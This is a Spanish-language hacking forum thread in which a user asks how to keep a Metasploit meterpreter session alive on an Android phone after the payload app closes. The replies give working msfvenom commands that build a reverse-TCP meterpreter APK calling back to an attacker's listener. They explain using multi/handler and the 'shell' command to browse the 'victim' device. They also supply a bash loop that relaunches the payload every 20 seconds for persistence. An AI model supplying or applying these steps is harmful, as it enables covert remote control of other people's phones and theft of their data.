[SOLUCIONADO] Ayuda con payload

Iniciado por sombra1234, Enero 02, 2019, 05:56:50 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Enero 02, 2019, 05:56:50 PM Ultima modificación: Enero 02, 2019, 07:54:54 PM por Gabriela
Buenas, oyer me puse a probar payloads de metasploit contra mi telefono andorid, al instalar el payload y darme sesion en meterpreter me di cuenta de que solo tengo la session activa cuando tengo la app abierta si la cierro se me quita la conexion, la cosa es que si habia alguna forma de tener tener la session abierta aun con la app cerrada
Enero 02, 2019, 06:51:09 PM #1
Por lo que entiendo, tu quieres conseguir una shell remota infectando a un android con un payload lo puedes generar con msfvenom por tanto intuyo que la aplicación/payload se crea correctamente, y luego, pones a la escucha (con el comando "use multi/handler") y si has puesto bien los puertos y todo, pues te agarrará una meterpreter, pues tu lo que quieres es a  traves de la meterpreter conseguir una shell remota?
si es eso solo tienes que escirbir en la meterpreter el comando "shell", y ya esta, navegas por el android  victima con comandos linux y ya esta.

ahora bien, si ese no es es problema, entonces es con el msfvenom, cuando creas el payload?


Ejemplo:

el comando: "msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST=192.168.43.167 LPORT=53 R > ANDROID3.apk" pienso que esta mal, ya que añades la plataforma dos veces, la correcta sería:

"msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.... lport=4444 R> /root/Escritorio/payload.apk"


Espero te sirva.
Enero 02, 2019, 07:00:06 PM #2 Ultima modificación: Enero 02, 2019, 07:20:20 PM por Mortal_Poison
Buenas tardes No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Como sabemos, la migración de procesos no funciona de igual forma en Android que en Windows. Por tanto, estoy suponiendo que ya tienes una session meterpreter con el objetivo y por tanto, deberás crear un .sh para posteriormente subirlo al teléfono Android y que se esté ejecutando de manera constante:

Script 'popular' usado para ello:
Código: bash
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done


Donde deberías poner el paquete y la activity del .apk que tienes(AndroidManifest.xml).

Un saludo.
Become the change you seek in the world. -Gandhi.

Enero 02, 2019, 07:13:01 PM #3
Eso es lo que buscaba @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta tienes alguna pagina o pdf que me explique un poco mas donde hay que colocarlo y eso, muchas gracias por la informacion
Enero 02, 2019, 07:13:39 PM #4
Muchas gracias @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta por la respuesta
Enero 02, 2019, 07:19:22 PM #5
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta puedes revisar más en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Él tiene una apk que descompilo anteriormente. Si quizás no conoces cómo hacerlo, puedes revisar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta de Underc0de donde se enseña cómo hacerlo.


Un saludo.
Become the change you seek in the world. -Gandhi.

Enero 02, 2019, 07:32:56 PM #6
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta Muchas gracias por la informacion! Ya me has solucionado mi duda
Imprimir
Ir Arriba Páginas1
Acciones del Usuario